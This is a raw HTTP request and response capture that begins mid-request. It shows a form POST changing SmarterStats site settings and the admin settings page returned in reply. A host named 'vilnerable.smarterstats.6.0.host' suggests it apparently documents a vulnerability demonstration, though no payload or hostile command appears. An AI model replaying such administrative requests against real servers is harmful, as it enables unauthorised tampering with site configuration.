GZiODQwOGRiMGJkN2RhZjk5NTZlM2VjZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFhkFJGN0bDAwJE1QSCRjaGtTZW9FbmFibGVkX1NldHRpbmdDaGVjawUoY3RsMDAkTVBIJGNoa1N0cmlwQWZ0ZXJTZW1pX1NldHRpbmdDaGVjawVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQwBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQzBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDQFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNQVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ2BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDcFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ5BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEwBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDExBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEyBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEzBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE0BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE1BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE2BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE3BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE4BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE5BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIwBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIxBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIxBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMQ8y1gsAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkOM5P3EdqRgSfYoIjJCDTiv3sZp5ktoudiy8rNReMpN8%3D&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:06 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:06 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 56808

1|#||4|11|updatePanel|ctl00_UpdatePanel1|
               
           |1411|updatePanel|ctl00_TPH_UpdatePanel1|
           
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Locations</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem5'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem7'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Status</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem8'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Processing Status</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>

       |22883|updatePanel|ctl00_MPH_UpdatePanel5|
           
           <a id="ctl00_MPH_btnUpdateIISImport" href="javascript:__doPostBack(&#39;ctl00$MPH$btnUpdateIISImport&#39;,&#39;&#39;)" style="display: none"></a>
           <a id="ctl00_MPH_btnRefresh" href="javascript:__doPostBack(&#39;ctl00$MPH$btnRefresh&#39;,&#39;&#39;)" style="display: none"></a>
           
<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
   <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
       <span id="ctl00_MPH_OptionsTab">
                   <table id="ctl00_MPH_tblAdminMain" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_txtDomainName">
               <td id="ctl00_MPH_txtDomainName_Label" class="Indent Fixed">Site Name</td><td id="ctl00_MPH_txtDomainName_Setting" class="Setting"><input name="ctl00$MPH$txtDomainName_SettingText" type="text" value="vilnerable.smarterstats.6.0.host" size="50" id="ctl00_MPH_txtDomainName_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtDomainUrl">
               <td id="ctl00_MPH_txtDomainUrl_Label" class="Indent Fixed">Site Url</td><td id="ctl00_MPH_txtDomainUrl_Setting" class="Setting"><input name="ctl00$MPH$txtDomainUrl_SettingText" type="text" size="50" id="ctl00_MPH_txtDomainUrl_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtSiteId">
               <td id="ctl00_MPH_txtSiteId_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_txtSiteId_Setting" class="Setting"><span id="ctl00_MPH_txtSiteId_ReadOnlyLabel">1</span></td>
           </tr><tr id="ctl00_MPH_lstServer">
               <td id="ctl00_MPH_lstServer_Label" class="Indent Fixed">Server</td><td id="ctl00_MPH_lstServer_Setting" class="Setting"><select name="ctl00$MPH$lstServer_SettingDropDown" id="ctl00_MPH_lstServer_SettingDropDown">
                   <option selected="selected" value="1">localhost</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstStatus">
               <td id="ctl00_MPH_lstStatus_Label" class="Indent Fixed">Current State</td><td id="ctl00_MPH_lstStatus_Setting" class="Setting"><select name="ctl00$MPH$lstStatus_SettingDropDown" id="ctl00_MPH_lstStatus_SettingDropDown">
                   <option selected="selected" value="start">Started</option>
                   <option value="paused">Paused</option>
                   <option value="disabled">Disabled</option>

               </select></td>
           </tr><tr id="ctl00_MPH_exSettingSmarterLogs">
               <td id="ctl00_MPH_exSettingSmarterLogs_Label" class="Indent Fixed">SmarterLog Path</td><td class=" Setting"><input name="ctl00$MPH$txtSmarterLogDirectory" type="text" value="C:\SmarterLogs" size="40" id="ctl00_MPH_txtSmarterLogDirectory" />
                               <input type="button" value="Browse" onclick="SmarterLogBrowse()" />
                           </td>
           </tr><tr id="ctl00_MPH_lstTimeZone">
               <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><span id="ctl00_MPH_lstTimeZone_ReadOnlyLabel">(GMT-06:00) Central Time (US & Canada)</span></td>
           </tr><tr id="ctl00_MPH_ddlChangeSiteAdmin">
               <td id="ctl00_MPH_ddlChangeSiteAdmin_Label" class="Indent Fixed">Site Admin</td><td id="ctl00_MPH_ddlChangeSiteAdmin_Setting" class="Setting"><select name="ctl00$MPH$ddlChangeSiteAdmin_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$ddlChangeSiteAdmin_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_ddlChangeSiteAdmin_SettingDropDown">
                   <option selected="selected" value="">New User</option>
                   <option value="hoytnet">hoytnet</option>

               </select></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_tblAdminCreate" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_txtAdminNewUserName">
               <td id="ctl00_MPH_txtAdminNewUserName_Label" class="Indent Fixed">Site Admin Username</td><td id="ctl00_MPH_txtAdminNewUserName_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewUserName_SettingText" type="text" id="ctl00_MPH_txtAdminNewUserName_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtAdminNewPassword">
               <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">Site Admin Password</td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_SettingsContainer5" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_chkSeoEnabled">
               <td id="ctl00_MPH_chkSeoEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSeoEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSeoEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSeoEnabled_SettingCheck" checked="checked" onclick="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$chkSeoEnabled_SettingCheck\&#39;,\&#39;\&#39;)&#39;, 0)" /><label for="ctl00_MPH_chkSeoEnabled_SettingCheck">Enable SEO</label></td>
           </tr>
       </table>
               </span></div>
   
               <div id='ctl00_MPH_LogOptionsTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogOptionsTab">
                   <table id="ctl00_MPH_SettingsContainer2" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_lstLogLocation">
               <td id="ctl00_MPH_lstLogLocation_Label" class="Indent Fixed">Log Location</td><td id="ctl00_MPH_lstLogLocation_Setting" class="Setting"><select name="ctl00$MPH$lstLogLocation_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$lstLogLocation_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_lstLogLocation_SettingDropDown">
                   <option selected="selected" value="Local">Local Path or UNC Path</option>
                   <option value="FTP">FTP</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstLogFormat">
               <td id="ctl00_MPH_lstLogFormat_Label" class="Indent Fixed">Log Format</td><td id="ctl00_MPH_lstLogFormat_Setting" class="Setting"><select name="ctl00$MPH$lstLogFormat_SettingDropDown" id="ctl00_MPH_lstLogFormat_SettingDropDown">
                   <option selected="selected" value="W3Cex">IIS - W3Cex Log Format</option>
                   <option value="IIS">IIS - Microsoft IIS Log Format</option>
                   <option value="NCSA">IIS - NCSA Common Log Format</option>
                   <option value="ApacheCLF">Apache - Common Log Format</option>
                   <option value="ApacheNCSAEx">Apache - NCSA Extended Log Format</option>
                   <option value="IPlanetCLF">IPlanet - Common Log Format</option>
                   <option value="CLF">Other - Common Log Format</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstMonthsToKeepSmStats">
               <td id="ctl00_MPH_lstMonthsToKeepSmStats_Label" class="Indent Fixed">Auto-Deletion</td><td id="ctl00_MPH_lstMonthsToKeepSmStats_Setting" class="Setting"><select name="ctl00$MPH$lstMonthsToKeepSmStats_SettingDropDown" id="ctl00_MPH_lstMonthsToKeepSmStats_SettingDropDown">
                   <option selected="selected" value="0">Never Delete</option>
                   <option value="1">Delete after 1 months</option>
                   <option value="2">Delete after 2 months</option>
                   <option value="3">Delete after 3 months</option>
                   <option value="4">Delete after 4 months</option>
                   <option value="5">Delete after 5 months</option>
                   <option value="6">Delete after 6 months</option>
                   <option value="7">Delete after 7 months</option>
                   <option value="8">Delete after 8 months</option>
                   <option value="9">Delete after 9 months</option>
                   <option value="10">Delete after 10 months</option>
                   <option value="11">Delete after 11 months</option>
                   <option value="12">Delete after 12 months</option>
                   <option value="13">Delete after 13 months</option>
                   <option value="14">Delete after 14 months</option>
                   <option value="15">Delete after 15 months</option>
                   <option value="16">Delete after 16 months</option>
                   <option value="17">Delete after 17 months</option>
                   <option value="18">Delete after 18 months</option>
                   <option value="19">Delete after 19 months</option>
                   <option value="20">Delete after 20 months</option>
                   <option value="21">Delete after 21 months</option>
                   <option value="22">Delete after 22 months</option>
                   <option value="23">Delete after 23 months</option>
                   <option value="24">Delete after 24 months</option>
                   <option value="25">Delete after 25 months</option>
                   <option value="26">Delete after 26 months</option>
                   <option value="27">Delete after 27 months</option>
                   <option value="28">Delete after 28 months</option>
                   <option value="29">Delete after 29 months</option>
                   <option value="30">Delete after 30 months</option>
                   <option value="31">Delete after 31 months</option>
                   <option value="32">Delete after 32 months</option>
                   <option value="33">Delete after 33 months</option>
                   <option value="34">Delete after 34 months</option>
                   <option value="35">Delete after 35 months</option>
                   <option value="36">Delete after 36 months</option>

               </select></td>
           </tr><tr id="ctl00_MPH_ExtensibleSetting1">
               <td id="ctl00_MPH_ExtensibleSetting1_Label" class="Indent Fixed">Export Directory</td><td class=" Setting"><input name="ctl00$MPH$txtExportLogDirectory" type="text" size="40" id="ctl00_MPH_txtExportLogDirectory" />
                               <input type="button" value="Browse" onclick="ExportLogBrowse()" />
                           </td>
           </tr><tr id="ctl00_MPH_txtLogFileExportLocURL">
               <td id="ctl00_MPH_txtLogFileExportLocURL_Label" class="Indent Fixed">Export Url</td><td id="ctl00_MPH_txtLogFileExportLocURL_Setting" class="Setting"><input name="ctl00$MPH$txtLogFileExportLocURL_SettingText" type="text" size="40" id="ctl00_MPH_txtLogFileExportLocURL_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_chkStripAfterSemi">
               <td id="ctl00_MPH_chkStripAfterSemi_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkStripAfterSemi_Setting" class="Setting"><input id="ctl00_MPH_chkStripAfterSemi_SettingCheck" type="checkbox" name="ctl00$MPH$chkStripAfterSemi_SettingCheck" /><label for="ctl00_MPH_chkStripAfterSemi_SettingCheck">Enable removal of URL items after semicolon (used for jsessionid)</label></td>
           </tr><tr id="ctl00_MPH_txtDefaultDocuments">
               <td id="ctl00_MPH_txtDefaultDocuments_Setting" class="Indent Setting" colspan="2"><span class='Label'>Default Documents (one per line)<br /></span><textarea name="ctl00$MPH$txtDefaultDocuments_SettingText" rows="4" cols="50" id="ctl00_MPH_txtDefaultDocuments_SettingText" class="text">
index.htm
index.html
default.asp
default.aspx</textarea></td>
           </tr>
       </table>
               </span></div>
   
               <div id='ctl00_MPH_LogLocationsTab' class='' style='display:none'>
